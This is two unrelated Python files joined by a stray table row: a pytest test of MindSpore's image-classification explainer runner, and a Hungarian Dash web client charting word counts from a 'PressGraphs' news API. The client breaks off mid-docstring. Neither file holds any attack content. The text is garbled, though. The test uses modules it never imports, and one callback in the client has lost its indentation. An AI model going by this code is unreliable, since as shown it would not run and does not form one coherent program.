import numpy as np
import pytest
from PIL import Image
from mindspore import context
import mindspore as ms
import mindspore.nn as nn
from mindspore.dataset import GeneratorDataset
from mindspore.explainer import ImageClassificationRunner
from mindspore.explainer._image_classification_runner import _normalize
from mindspore.explainer.benchmark import Faithfulness
from mindspore.explainer.explanation import Gradient
from mindspore.train.summary import SummaryRecord
# Random constant lets the tests verify that mocked benchmark scores
# actually flow through the runner (any fixed value could pass by accident).
CONST = random()
# Number of synthetic samples yielded by the generator below.
NUMDATA = 2
context.set_context(mode=context.PYNATIVE_MODE)
def image_label_bbox_generator():
    """Yield NUMDATA synthetic (image, label, bbox) triples for the dataset."""
    for index in range(NUMDATA):
        # Deterministic 3x4x4 image whose values depend on the sample index.
        pixels = np.arange(index, index + 16 * 3).reshape((3, 4, 4)) / 50
        yield (pixels, np.array(index), np.array([1, 1, 2, 2]))
class SimpleNet(nn.Cell):
    """
    Simple model for the unit test.
    Ignores its input and always predicts the fixed distribution [0.1, 0.9],
    so class 1 is always the predicted label.
    """
    def __init__(self):
        super(SimpleNet, self).__init__()
        self.reshape = ms.ops.operations.Reshape()
    def construct(self, x):
        # Constant probabilities reshaped to a (1, 2) batch.
        prob = ms.Tensor([0.1, 0.9], ms.float32)
        prob = self.reshape(prob, (1, 2))
        return prob
class ActivationFn(nn.Cell):
    """
    Simple activation function for unit test.
    Identity mapping: returns its input unchanged.
    """
    def __init__(self):
        super(ActivationFn, self).__init__()
    def construct(self, x):
        return x
def mock_gradient_call(_, inputs, targets):
    """Stand-in for Gradient.__call__: the saliency map is just channel 0."""
    first_channel = inputs[:, :1, :, :]
    return first_channel
def mock_faithfulness_evaluate(_, explainer, inputs, targets, saliency):
    # Deterministic stand-in for Faithfulness.evaluate: the score is
    # proportional to the target label via the module-level CONST.
    return CONST * targets
def mock_make_rgba(array):
    # Bypass real RGBA conversion; just unwrap the tensor to a numpy array.
    return array.asnumpy()
class TestRunner:
    """Test on Runner.

    Patches SummaryRecord.add_value to capture everything the runner would
    write to the summary file, then asserts on the captured records in order:
    metadata, then per-sample (sample, inference[, explanation]) entries,
    then optional benchmark results.
    """
    def setup_method(self):
        # Fresh dataset/network/explainer per test; summary_dir is removed
        # again in teardown_method.
        self.dataset = GeneratorDataset(image_label_bbox_generator, ["image", "label", "bbox"])
        self.labels = ["label_{}".format(i) for i in range(2)]
        self.network = SimpleNet()
        self.summary_dir = "summary_test_temp"
        self.explainer = [Gradient(self.network)]
        self.activation_fn = ActivationFn()
        self.benchmarkers = [Faithfulness(num_labels=len(self.labels),
                                          metric="NaiveFaithfulness",
                                          activation_fn=self.activation_fn)]
    @pytest.mark.level0
    @pytest.mark.platform_arm_ascend_training
    @pytest.mark.platform_x86_ascend_training
    @pytest.mark.env_onecard
    def test_run_saliency_no_benchmark(self):
        """Test case when argument benchmarkers is not parsed."""
        res = []
        runner = ImageClassificationRunner(summary_dir=self.summary_dir, data=(self.dataset, self.labels),
                                           network=self.network, activation_fn=self.activation_fn)
        # Capture every (plugin, name, value) triple instead of writing summaries.
        def mock_summary_add_value(_, plugin, name, value):
            res.append((plugin, name, value))
        with patch.object(SummaryRecord, "add_value", mock_summary_add_value), \
                patch.object(Gradient, "__call__", mock_gradient_call):
            runner.register_saliency(self.explainer)
            runner.run()
        # test on meta data
        idx = 0
        assert res[idx][0] == "explainer"
        assert res[idx][1] == "metadata"
        assert res[idx][2].metadata.label == self.labels
        assert res[idx][2].metadata.explain_method == ["Gradient"]
        # test on inference data
        for i in range(NUMDATA):
            idx += 1
            # Must match the image produced by image_label_bbox_generator.
            data_np = np.arange(i, i + 3 * 16).reshape((3, 4, 4)) / 50
            assert res[idx][0] == "explainer"
            assert res[idx][1] == "sample"
            assert res[idx][2].sample_id == i
            original_path = os.path.join(self.summary_dir, res[idx][2].image_path)
            with open(original_path, "rb") as f:
                image_data = np.asarray(Image.open(f)) / 255.0
            # Loose tolerance absorbs 8-bit PNG quantization of the image.
            original_image = _normalize(np.transpose(data_np, [1, 2, 0]))
            assert np.allclose(image_data, original_image, rtol=3e-2, atol=3e-2)
            idx += 1
            assert res[idx][0] == "explainer"
            assert res[idx][1] == "inference"
            assert res[idx][2].sample_id == i
            assert res[idx][2].ground_truth_label == [i]
            # SimpleNet always outputs [0.1, 0.9], so class 1 is predicted.
            diff = np.array(res[idx][2].inference.ground_truth_prob) - np.array([[0.1, 0.9][i]])
            assert np.max(np.abs(diff)) < 1e-6
            assert res[idx][2].inference.predicted_label == [1]
            diff = np.array(res[idx][2].inference.predicted_prob) - np.array([0.9])
            assert np.max(np.abs(diff)) < 1e-6
        # test on explanation data
        for i in range(NUMDATA):
            idx += 1
            data_np = np.arange(i, i + 3 * 16).reshape((3, 4, 4)) / 50
            # mock_gradient_call returns channel 0 as the saliency map.
            saliency_np = data_np[0, :, :]
            assert res[idx][0] == "explainer"
            assert res[idx][1] == "explanation"
            assert res[idx][2].sample_id == i
            assert res[idx][2].explanation[0].explain_method == "Gradient"
            assert res[idx][2].explanation[0].label in [i, 1]
            heatmap_path = os.path.join(self.summary_dir, res[idx][2].explanation[0].heatmap_path)
            assert os.path.exists(heatmap_path)
            with open(heatmap_path, "rb") as f:
                heatmap_data = np.asarray(Image.open(f)) / 255.0
            heatmap_image = _normalize(saliency_np)
            assert np.allclose(heatmap_data, heatmap_image, atol=3e-2, rtol=3e-2)
    @pytest.mark.level0
    @pytest.mark.platform_arm_ascend_training
    @pytest.mark.platform_x86_ascend_training
    @pytest.mark.env_onecard
    def test_run_saliency_with_benchmark(self):
        """Test case when argument benchmarkers is parsed."""
        res = []
        def mock_summary_add_value(_, plugin, name, value):
            res.append((plugin, name, value))
        runner = ImageClassificationRunner(summary_dir=self.summary_dir, data=(self.dataset, self.labels),
                                           network=self.network, activation_fn=self.activation_fn)
        with patch.object(SummaryRecord, "add_value", mock_summary_add_value), \
                patch.object(Gradient, "__call__", mock_gradient_call), \
                patch.object(Faithfulness, "evaluate", mock_faithfulness_evaluate):
            runner.register_saliency(self.explainer, self.benchmarkers)
            runner.run()
        idx = 3 * NUMDATA + 1  # start index of benchmark data
        assert res[idx][0] == "explainer"
        assert res[idx][1] == "benchmark"
        # Mocked evaluate returns CONST * target, so scores are known exactly.
        assert abs(res[idx][2].benchmark[0].total_score - 2 / 3 * CONST) < 1e-6
        diff = np.array(res[idx][2].benchmark[0].label_score) - np.array([i * CONST for i in range(NUMDATA)])
        assert np.max(np.abs(diff)) < 1e-6
    def teardown_method(self):
        # Remove the temporary summary directory created by the runner.
        shutil.rmtree(self.summary_dir)
| 7,522 | 2,441 |
"""
PRESSGRAPHS DASH CLIENT
WEB GUI interface for PressGraphs WebAPI
"""
###################################
# IMPORTS
###################################
#builtins
from datetime import datetime
from datetime import timedelta
#3rd party
import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import dash_table as dt
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import requests
from dash.dependencies import Input, Output, State
#oww
from md import md_txt
###################################
# DEFINITIONS
###################################
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.CERULEAN])
app.title = 'Press Graphs'
# Callbacks reference components that only exist on sub-pages, so Dash's
# upfront layout validation must be relaxed.
app.config.suppress_callback_exceptions = True
server = app.server
startup_time = datetime.now().strftime("%Y %m %d %H:%M")
API_KEY = "" # register your own API key at http://pressgraphs.pythonanywhere.com/create/test_user
MAX_REQUEST_DAY = 90
def build_layout():
    """
    Serve app.layout on every page load: a navigation bar plus the
    'page-content' container filled by the URL-routing callback.

    Fix: the last few nav links used relative hrefs ("words_tab", "mo",
    "manual", "contact") while display_page matches absolute paths
    ("/words_tab", ...); the hrefs are now absolute and consistent.
    """
    layout = html.Div(style={"padding":"2vw"},
                 children=[dcc.Location(id='url', refresh=True),
                           dbc.Nav([
                               dbc.NavItem(dbc.NavLink("kezdőlap", active=True, href="/")),
                               dbc.NavItem(dbc.NavLink("dátum szerint", href="/all_date")),
                               dbc.NavItem(dbc.NavLink("újságok szerint", href="/all_org")),
                               dbc.NavItem(dbc.NavLink("újság szerint", href="/site_tab")),
                               dbc.NavItem(dbc.NavLink("két újság összevetése", href="/site_vs_tab")),
                               dbc.NavItem(dbc.NavLink("két szó összevetése", href="/words_tab")),
                               dbc.DropdownMenu(
                                   [dbc.DropdownMenuItem("újságok", href="/mo"),
                                    dbc.DropdownMenuItem("útmutató", href ="/manual"),
                                    dbc.DropdownMenuItem("elérhetőség", href="/contact")],
                                   label="további info",
                                   nav=True)]),
                           html.Hr(),
                           html.Div(id='page-content'),
                           html.Hr()])
    return layout
def md_linkler(url: str) ->str:
    """Return *url* wrapped as a Markdown inline link labelled 'link'."""
    return f"[link]({url})"
def update_dt_by_date(dataframe: pd.DataFrame) -> dt.DataTable:
    """
    updates dash_table with passed dataframe
    returns dash_table

    Adds a markdown 'link' column derived from the 'url' column (mutates
    the passed frame in place) and renders an exportable, scrollable table.
    """
    dataframe["link"] = dataframe["url"].copy()
    dataframe["link"] = dataframe["link"].apply(md_linkler)
    # 'link' is rendered as markdown so the cell shows a clickable anchor.
    columns = [{'name': 'dátum', 'id':'date'},
               {'name': 'oldal', 'id':'site'},
               {'name': 'cím', 'id':'title'},
               {'name': 'link', 'id':'link', 'type':'text', 'presentation': 'markdown'},
               {'name': 'url', 'id':'url'}]
    data = dataframe.to_dict('records')
    data_table = dt.DataTable(
        style_table={"padding": "50px", "maxHeight": '350px',
                     "overflowY": "scroll"},
        style_data={'whiteSpace': 'normal', 'height': 'auto'},
        style_cell={'textAlign': 'left'},
        style_cell_conditional=[
            {'if': {'column_id': 'date'}, 'width': '30px'},
            {'if': {'column_id': 'site'}, 'width': '30px'},
            {'if': {'column_id': 'title'}, 'width': '250px'},
            {'if': {'column_id': 'link'}, 'width': '30px'},
            {'if': {'column_id': 'url'}, 'width': '100px'}],
        data=data,
        columns=columns,
        page_size=50,
        export_format="xlsx")
    return data_table
def plot_all_by_date(*, dataframe: pd.DataFrame, search_word: str) -> px.bar:
    """
    Bar chart of daily article-title hits for *search_word*.

    Expects a frame indexed by date with a single count column (renamed in
    place to the Hungarian display label). Returns an empty bar chart when
    the frame is empty.
    """
    if len(dataframe) > 0:
        dataframe.columns = ["találatok száma"]
        fig = px.bar(dataframe,
                     height=500,
                     x=dataframe.index,
                     y="találatok száma",
                     color="találatok száma",
                     labels={"x": "dátum", "date": "cikkek száma"},
                     opacity=.75,
                     color_continuous_scale="Geyser"
                     )
        fig.update_layout(
            title={'text': f"""A '{search_word}' szó száma a cikkek címeiben
                     {dataframe.index.min()}--{dataframe.index.max()}.""",
                   'y': 0.900,
                   'x': 0.50},
            xaxis_title="Dátum",
            yaxis_title="Cikkek száma",
            yaxis_tickformat = 'd',
            transition={'duration': 500},
            plot_bgcolor="rgba(0,0,0,0)",
            font={"family":"Courier New, monospace",
                  "size":11,
                  "color":"#000000"
                  })
        fig.update_xaxes(showgrid=False)
        fig.update_yaxes(showgrid=True, gridcolor = '#bdbdbd')
        # With very few bars the tick labels clutter; hide them and use
        # unit ticks instead.
        if len(dataframe) < 5:
            fig.update_layout(xaxis_showticklabels = False, width=750)
            fig.update_yaxes(showgrid=False, dtick=1)
        return fig
    return px.bar()
def plot_all_by_sites(*, dataframe: pd.DataFrame, search_word: str):
    """
    Horizontal bar chart of per-site hit counts for the last 90 days.

    Expects a frame indexed by site with a 'title' count column (renamed in
    place to 'darab'). *search_word* is currently unused but kept for a
    uniform plotting interface. Returns an empty chart for an empty frame.
    """
    if len(dataframe) > 0:
        df = dataframe
        df.rename(columns={'title': 'darab'}, inplace=True)
        fig = px.bar(df,
                     height=1500,
                     orientation='h',
                     x="darab",
                     y=df.index,
                     labels={"y": "orgánum", "x": "cikkek száma"},
                     opacity=.75,
                     )
        fig.update_layout(
            title={'text': "Találatok az elmúlt 90 napból"},
            plot_bgcolor="rgba(0,0,0,0)",
            yaxis_title="Újságok",
            xaxis_title="Cikkek száma",
            font={
                "family":"Courier New, monospace",
                "size":10,
                "color":"#000000"
                })
        fig.update_traces(marker_color='black')
        fig.update_xaxes(showgrid=True, gridcolor='#bdbdbd')
        fig.update_yaxes(showgrid=False)
        return fig
    return px.bar()
def compare_two_sites(*,
                      search_word,
                      site1_df,
                      site2_df,
                      site_1,
                      site_2):
    """
    Line chart comparing daily counts of *search_word* on two sites, with a
    Pearson correlation annotation. Expects both frames indexed by date with
    a 'count' column. Returns an empty chart when *search_word* is falsy.
    """
    if search_word:
        search_word = str(search_word).lower()
        # Pearson correlation between the two daily-count series.
        site_corr = site1_df["count"].corr(site2_df["count"])
        fig = go.Figure(
            layout=go.Layout(
                annotations=[go.layout.Annotation(
                    text=f'Korrelációs együttható (r): {site_corr:.2f}',
                    hovertext="""Tartomány: -1 és 1 között. Jelzi két tetszőleges érték közötti lineáris kapcsolat nagyságát és irányát.""",
                    borderpad=1,
                    bgcolor="#ffffcc",
                    align='left',
                    showarrow=False,
                    xref='paper',
                    yref='paper',
                    x=0,
                    y=1,
                    bordercolor='grey',
                    borderwidth=1)]))
        fig.add_trace(go.Scatter(x=site1_df.index, y=site1_df["count"],
                                 mode='lines',
                                 line_shape='linear',
                                 name=f'{site_1}'))
        fig.add_trace(go.Scatter(x=site2_df.index, y=site2_df["count"],
                                 mode='lines',
                                 line_shape='linear',
                                 name=f'{site_2}'))
        fig.update_layout(
            title=f"""'{site_1}' és '{site_2}': '{search_word}' szó száma a cikkek címeiben""",
            xaxis_title="Dátum",
            yaxis_title="Cikkek száma",
            plot_bgcolor="rgba(0,0,0,0)",
            )
        fig.update_xaxes(showgrid=False)
        fig.update_yaxes(showgrid=True, gridcolor='#bdbdbd')
        return fig
    return px.bar()
def compare_two_search_words(*,
                             sw_df_1,
                             sw_df_2,
                             search_word_1,
                             search_word_2):
    """
    Line chart comparing daily counts of two search words (all sites), with
    a Pearson correlation annotation. Expects both frames indexed by date
    with a 'count' column. Returns an empty chart when *search_word_1* is
    falsy (e.g. before the first submit).
    """
    if search_word_1:
        # Only the first whitespace-separated token of each word is shown.
        sw1 = search_word_1.split()[0].strip()
        sw2 = search_word_2.split()[0].strip()
        corr = sw_df_1["count"].corr(sw_df_2["count"])
        fig = go.Figure(
            layout=go.Layout(
                annotations=[go.layout.Annotation(
                    text=f'Korrelációs együttható (r): {corr:.2f}',
                    hovertext="""Tartomány: -1 és 1 között.""",
                    borderpad=1,
                    bgcolor="#ffffcc",
                    align='left',
                    showarrow=False,
                    xref='paper',
                    yref='paper',
                    x=0,
                    y=1,
                    bordercolor='grey',
                    borderwidth=1)]))
        fig.add_trace(go.Scatter(x=sw_df_1.index, y=sw_df_1["count"],
                                 mode='lines',
                                 line_shape='linear',
                                 name=f'{sw1}'))
        fig.add_trace(go.Scatter(x=sw_df_2.index, y=sw_df_2["count"],
                                 mode='lines',
                                 line_shape='linear',
                                 name=f'{sw2}'))
        fig.update_layout(
            height=600,
            title={'text': f"'{sw1}' és '{sw2}' szavak száma a cikkek címeiben",
                   'y':0.90,
                   'x':0.5},
            xaxis_title="Dátum",
            yaxis_title="Cikkek száma",
            plot_bgcolor="rgba(0,0,0,0)",
            font=dict(
                family="Courier New, monospace",
                size=11,
                color="#000000"
            ))
        fig.update_xaxes(showgrid=False)
        fig.update_yaxes(showgrid=True, gridcolor='#bdbdbd')
        return fig
    return px.bar()
###################################
# LAYOUT
###################################
print("loading layout")
# Assigning the function itself (not its result) makes Dash rebuild the
# layout on every page load.
app.layout = build_layout
@app.callback(
    Output('page-content', 'children'),
    [Input('url', 'pathname')])
def display_page(pathname):
    """Route the browser path to the matching page layout; index by default."""
    routes = {
        '/all_date': page_1_layout,
        '/all_org': page_2_layout,
        '/site_tab': page_3_layout,
        '/site_vs_tab': page_4_layout,
        '/words_tab': page_5_layout,
        '/contact': page_6_layout,
        '/manual': page_7_layout,
        '/mo': page_8_layout,
    }
    return routes.get(pathname, index_page)
###################################
# INDEX
###################################
# Landing page: static markdown description.
index_page = html.Div([
    dcc.Markdown(children=md_txt.index_txt)])
###################################
# PAGE 1 LAYOUT
###################################
# "By date" page: search input + submit button + in-word-match switch,
# a daily bar chart, and a detail table filled when a bar is clicked.
page_1_layout = html.Div([
    dbc.Row(dbc.Col(html.Div(
        dbc.Input(id="search_input",
                  placeholder="keresett szó...",
                  type="text",
                  value="")), width=3)),
    html.Br(),
    dbc.Button("Keresés",
               outline=True,
               color="info",
               className="mr-1",
               id='submit-button',
               n_clicks=0),
    dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
                  value=[],
                  id="switch-input",
                  switch=True),
    dcc.Graph(id='max_date_bargraph'),
    html.Div(id="table1", style={'font-family': 'Impact'})])
###################################
# PAGE 1 CHART CALLBACK
###################################
@app.callback(Output('max_date_bargraph', 'figure'),
              [Input('submit-button', 'n_clicks'),
               Input('search_input', 'n_submit'),
               Input('switch-input', 'value')],
              [State('search_input', 'value')])
def date_count_all_site(n_clicks, n_submit, switch_value, search_word):
    """
    Count matching article titles per day over all sites and plot them.

    Fix: the original fell through and returned None on the initial
    automatic callback fire (no click/submit yet), which Dash reports as
    an invalid figure; an empty bar chart is returned instead.
    """
    if not (n_clicks or n_submit):
        return px.bar()
    search_word = search_word.strip()
    # The API expects a 1/0 flag for matching inside words.
    if switch_value:
        switch_value = 1
    else:
        switch_value = 0
    site = "all"
    today = datetime.today().strftime("%Y-%m-%d")
    from_date = (datetime.today() -
                 timedelta(days=MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
    # All query parameters are path segments of the REST endpoint.
    api_url = (f"http://pressgraphs.pythonanywhere.com/date/count/"
               f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}")
    response = requests.get(api_url)
    content = response.json()[1]["data"]
    res_df = pd.DataFrame(content)
    if len(res_df) > 0:
        res_df.set_index("date", inplace=True)
    else:
        res_df = pd.DataFrame()
    fig = plot_all_by_date(dataframe=res_df, search_word=search_word)
    return fig
###################################
# PAGE 1 DATA TABLE CALLBACK
###################################
@app.callback(Output('table1', 'children'),
              [Input('max_date_bargraph', 'clickData'),
               Input('submit-button', 'n_clicks'),
               Input('switch-input', 'value')],
              [State('search_input', 'value')])
def update_table(clickData, n_clicks, switch_value, search_word):
    """
    Fill the page-1 detail table with the articles behind a clicked bar.
    Does nothing until the user has clicked a bar (clickData present).
    """
    if clickData:
        search_word = search_word.strip()
        # The clicked bar's x label is the day to drill into.
        date = list(clickData["points"])[0]["label"]
        site = "all"
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
            f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{site}"
        response = requests.get(api_url)
        content = response.json()[1]["data"]
        df = pd.DataFrame(content)
        return update_dt_by_date(df)
    else:
        return
###################################
# PAGE 2 LAYOUT
###################################
# "By newspapers" page: search controls plus a horizontal per-site bar
# chart and a click-to-drill-down detail table.
page_2_layout = html.Div([
    dbc.Row(dbc.Col(html.Div(
        dbc.Input(id="search_input",
                  placeholder="keresett szó...",
                  type="text",
                  value="")), width=3)),
    html.Br(),
    dbc.Button("Keresés",
               outline=True,
               color="info",
               className="mr-1",
               id='submit-button',
               n_clicks=0),
    dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
                  value=[],
                  id="switch-input",
                  switch=True),
    html.Div(id='my-output'),
    dcc.Graph(id='bargraph_2'),
    html.Div(id="table2", style={'font-family': 'Impact'})])
###################################
# PAGE 2 CHART CALLBACK
###################################
@app.callback(Output('bargraph_2', 'figure'),
              [Input('submit-button', 'n_clicks'),
               Input('search_input', 'n_submit'),
               Input('switch-input', 'value')],
              [State('search_input', 'value')])
def update_by_site(n_clicks, n_submit, switch_value, search_word):
    """Aggregate the last 90 days of hits per site and plot them."""
    if n_clicks or n_submit:
        search_word = search_word.strip()
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        site="all"
        today = datetime.today().strftime("%Y-%m-%d")
        from_date = (datetime.today() - \
            timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
        api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
            f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}"
        response = requests.get(api_url)
        content = response.json()[1]["data"]
        res_df = pd.DataFrame(content)
        # Count article titles per site; ascending order so the largest
        # bars end up at the top of the horizontal chart.
        df = res_df.groupby(by="site").count()["title"]
        df = pd.DataFrame(df.sort_values(ascending=True)[:])
    else:
        # Initial fire: hand an empty frame to the plot helper.
        df = pd.DataFrame()
    fig = plot_all_by_sites(dataframe=df, search_word=search_word)
    return fig
###################################
# PAGE 2 DATA TABLE CALLBACK
###################################
@app.callback(Output('table2', 'children'),
              [Input('bargraph_2', 'clickData'),
               Input('submit-button', 'n_clicks'),
               Input('switch-input', 'value')],
              [State('search_input', 'value')])
def display_clickData_2(clickData, n_clicks, switch_value, search_word):
    """List the last 90 days of matching articles for the clicked site."""
    if clickData:
        search_word = search_word.strip()
        today = datetime.today().strftime("%Y-%m-%d")
        from_date = (datetime.today() - \
            timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
        # The clicked bar's y label is the site to drill into.
        site = list(clickData["points"])[0]["label"]
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
            f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}"
        response = requests.get(api_url)
        content = response.json()[1]["data"]
        df = pd.DataFrame(content)
        return update_dt_by_date(df)
    else:
        return
###################################
# PAGE 3 LAYOUT
###################################
# NOTE(review): this request runs at import time -- if the API is down the
# whole app fails to start. Consider lazy-loading the site list.
api_url = f"""http://pressgraphs.pythonanywhere.com/{API_KEY}/info/sites/all"""
response = requests.get(api_url)
schema = response.json()[0]
st_options = pd.DataFrame(response.json()[1]["data"])
# "By newspaper" page: word input plus a site dropdown fed from st_options.
page_3_layout = html.Div([
    html.H5("oldal szerinti keresés"),
    dbc.Row(dbc.Col(html.Div(
        dbc.Input(id="search_input",
                  placeholder="keresett szó...",
                  type="text",
                  value='')), width=3)),
    html.Br(),
    dbc.Row(dbc.Col(html.Div(dcc.Dropdown(
        id="sites",
        options=[{
            'label': i,
            'value': i
        } for i in st_options["site"]],
        placeholder="keresett oldal...",
        value='')), width=3)),
    html.Br(),
    dbc.Button("Keresés",
               outline=True,
               color="info",
               className="mr-1",
               id='submit-button',
               n_clicks=0),
    dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
                  value=[],
                  id="switch-input",
                  switch=True),
    dcc.Graph(id='bargraph_3'),
    html.Div(id="table3")])
###################################
# PAGE 3 CHART CALLBACK
###################################
@app.callback(Output('bargraph_3','figure'),
              [Input('submit-button', 'n_clicks'),
               Input('search_input', 'n_submit'),
               Input('switch-input', 'value')],
              [State('search_input', 'value'),
               State('sites', 'value')])
def update_site_graph(n_clicks, n_submit, switch_value, search_word, site):
    """
    Count daily hits for one selected site and plot them as a bar chart.

    Fix: the original returned None on the initial automatic callback fire,
    which Dash reports as an invalid figure; an empty bar chart is returned
    instead. The no-op ``site=site`` assignment was dropped.
    """
    if not (n_clicks or n_submit):
        return px.bar()
    search_word = search_word.strip()
    # The API expects a 1/0 flag for matching inside words.
    if switch_value:
        switch_value = 1
    else:
        switch_value = 0
    today = datetime.today().strftime("%Y-%m-%d")
    from_date = (datetime.today() -
                 timedelta(days=MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
    api_url = (f"http://pressgraphs.pythonanywhere.com/date/count/"
               f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{site}")
    response = requests.get(api_url)
    content = response.json()[1]["data"]
    res_df = pd.DataFrame(content)
    if len(res_df) > 0:
        res_df.set_index("date",inplace=True)
    else:
        res_df = pd.DataFrame()
    fig = plot_all_by_date(dataframe=res_df,
                           search_word=search_word)
    return fig
###################################
# PAGE 3 DATA TABLE CALLBACK
###################################
@app.callback(Output('table3', 'children'),
              [Input('bargraph_3', 'clickData'),
               Input('submit-button', 'n_clicks'),
               Input('switch-input', 'value')],
              [State('search_input', 'value'),
               State('sites', 'value')])
def display_clickData_3(clickData, n_clicks, switch_value, search_word, site):
    """
    List the selected site's matching articles for the clicked day.
    """
    if clickData:
        search_word = search_word.strip()
        # The clicked bar's x label is the day to drill into.
        date = list(clickData["points"])[0]["label"]
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
            f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{site}"
        response = requests.get(api_url)
        content = response.json()[1]["data"]
        df = pd.DataFrame(content)
        return update_dt_by_date(df)
    else:
        return
###################################
# PAGE 4 LAYOUT
###################################
# NOTE(review): duplicates the import-time site-list fetch from page 3;
# the two pages could share one request.
api_url = f"""http://pressgraphs.pythonanywhere.com/{API_KEY}/info/sites/all"""
response = requests.get(api_url)
schema = response.json()[0]
st_options = pd.DataFrame(response.json()[1]["data"])
# "Compare two newspapers" page: one word input and two site dropdowns.
page_4_layout = html.Div([
    html.H5("két oldal összevetése"),
    dbc.Row(dbc.Col(html.Div(
        dbc.Input(id="search_input",
                  placeholder="keresett szó...",
                  type="text",
                  value='')),width=3)),
    html.Br(),
    dbc.Row(dbc.Col(html.Div(dcc.Dropdown(
        id="site_1",
        options=[{
            'label': i,
            'value': i
        } for i in st_options["site"]],
        placeholder="első oldal...",
        value='')), width=3)),
    html.Br(),
    dbc.Row(dbc.Col(html.Div(dcc.Dropdown(
        id="site_2",
        options=[{
            'label': i,
            'value': i
        } for i in st_options["site"]],
        placeholder="második oldal...",
        value='')), width=3)),
    html.Br(),
    dbc.Button("Keresés",
               outline=True,
               color="info",
               className="mr-1",
               id='submit-button',
               n_clicks=0),
    dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
                  value=[],
                  id="switch-input",
                  switch=True,
                  ),
    dcc.Graph(id='graph_4'),
    html.Div(id="table4")])
###################################
# PAGE 4 CAHRT CALLBACK
###################################
@app.callback(Output('graph_4','figure'),
[Input('submit-button', 'n_clicks'),
Input('search_input', 'n_submit'),
Input('switch-input', 'value')],
[State('search_input', 'value'),
State('site_1', 'value'),
State('site_2', 'value')])
def update_site_comparison(n_clicks, n_submit, switch_value, search_word, st1, st2):
"""
#TODO
"""
if n_clicks or n_submit:
search_word = search_word.strip()
if switch_value:
switch_value = 1
else:
switch_value = 0
today = datetime.today().strftime("%Y-%m-%d")
from_date = (datetime.today() - \
timedelta(days = MAX_REQUEST_DAY)).strftime("%Y-%m-%d")
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{st1}"""
response = requests.get(api_url)
s_1_content = response.json()[1]["data"]
s1_df = pd.DataFrame(s_1_content)
s1_df.set_index("date", inplace=True)
api_url = f"http://pressgraphs.pythonanywhere.com/date/count/"\
f"{API_KEY}/{search_word}/{switch_value}/{from_date}/{today}/{st2}"""
response = requests.get(api_url)
s_2_content = response.json()[1]["data"]
s2_df = pd.DataFrame(s_2_content)
s2_df.set_index("date", inplace=True)
else:
s1_df = pd.DataFrame()
s2_df = pd.DataFrame()
fig = compare_two_sites(search_word=search_word,
site1_df=s1_df,
site2_df=s2_df,
site_1=st1,
site_2=st2)
return fig
###################################
# PAGE 4 DATA TABLE CALLBACK
###################################
@app.callback(
    Output('table4', 'children'),
    [Input('graph_4', 'clickData'),
     Input('submit-button', 'n_clicks'),
     Input('switch-input', 'value')],
    [State('search_input', 'value'),
     State('site_1', 'value'),
     State('site_2', 'value')]
)
def display_clickData_4(clickData, n_clicks, switch_value, search_word, st1, st2):
    """
    List the articles behind a clicked point; which site is queried depends
    on which of the two traces was clicked (curveNumber 0 -> site 1).
    """
    if clickData:
        search_word = search_word.strip()
        date = list(clickData["points"])[0]["x"]
        if switch_value:
            switch_value = 1
        else:
            switch_value = 0
        # Trace index identifies whether site 1 or site 2 was clicked.
        site_indicator = clickData["points"][0]['curveNumber']
        if site_indicator == 0:
            api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
                f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{st1}"
        else:
            api_url = f"http://pressgraphs.pythonanywhere.com/date/list/"\
                f"{API_KEY}/{search_word}/{switch_value}/{date}/{date}/{st2}"
        response = requests.get(api_url)
        content = response.json()[1]["data"]
        df = pd.DataFrame(content)
        return update_dt_by_date(df)
    else:
        return
###################################
# PAGE 5 LAYOUT
###################################
# "Compare two words" page: two word inputs, shared submit button/switch,
# comparison line chart and click-to-drill-down table.
page_5_layout = html.Div([
    html.H5("két szó összevetése"),
    dbc.Row(dbc.Col(html.Div(
        dbc.Input(id="search_input_1",
                  placeholder="első keresett szó...",
                  type="text",
                  value='')), width=3)),
    html.Br(),
    dbc.Row(dbc.Col(html.Div(
        dbc.Input(id="search_input_2",
                  placeholder="második keresett szó...",
                  type="text",
                  value='')), width=3)),
    html.Br(),
    dbc.Button("Keresés",
               outline=True,
               color="info",
               className="mr-1",
               id='submit-button',
               n_clicks=0),
    dbc.Checklist(options=[{"label": "keresés szavakon belül", "value": 1}],
                  value=[],
                  id="switch-input",
                  switch=True),
    dcc.Graph(id='graph_5'),
    html.Div(id="table5")])
###################################
# PAGE 5 CHART CALLBACK
###################################
@app.callback(
    Output('graph_5','figure'),
    [Input('submit-button', 'n_clicks'),
     Input('switch-input', 'value')],
    [State('search_input_1', 'value'),
     State('search_input_2', 'value')])
def update_word_comparison(n_clicks, switch_value, sw_1, sw_2):
    """
    Compare daily counts of two search words (all sites) on one line chart.

    Bug fix: the original guard read ``if n_clicks or n_submit`` but this
    callback has no ``n_submit`` argument, so the initial automatic fire
